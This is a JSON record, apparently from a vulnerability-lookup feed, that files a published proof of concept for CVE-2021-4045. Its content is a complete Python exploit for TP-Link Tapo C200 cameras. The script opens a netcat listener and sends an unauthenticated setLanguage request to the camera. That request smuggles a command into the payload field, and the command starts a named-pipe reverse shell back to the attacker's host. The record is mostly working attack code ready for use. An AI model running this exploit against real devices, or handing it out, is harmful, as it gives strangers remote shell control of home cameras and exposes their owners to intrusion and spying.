{"uuid": "4db3d5e8-6760-4c74-82c3-b2a02b9c0bd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4045", "type": "published-proof-of-concept", "source": "https://t.me/isendpackets/98", "content": "# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)\n# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/\n# Version: 1.1.15 and below\n# Tested on: 1.1.11, 1.1.14 and 1.1.15\n# CVE : CVE-2021-4045\n\n# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce\n\nimport requests, urllib3, sys, threading, os\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nPORT = 1337\nREVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'\nNC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)\n\nif len(sys.argv) < 3:\n    print(\"Usage: python3 pwnTapo.py  \")\n    exit()\n\nvictim = sys.argv[1]\nattacker = sys.argv[2]\n\nprint(\"[+] Listening on %d\" % PORT)\nt = threading.Thread(target=os.system, args=(NC_COMMAND,))\nt.start()\n\nprint(\"[+] Serving payload to %s\\n\" % victim)\nurl = \"https://\" + victim + \":443/\"\njson = {\"method\": \"setLanguage\", \"params\": {\"payload\": \"';\" + REVERSE_SHELL % (attacker, PORT) + \";'\"}}\nrequests.post(url, json=json, verify=False)", "creation_timestamp": "2022-10-08T02:31:38.000000Z"}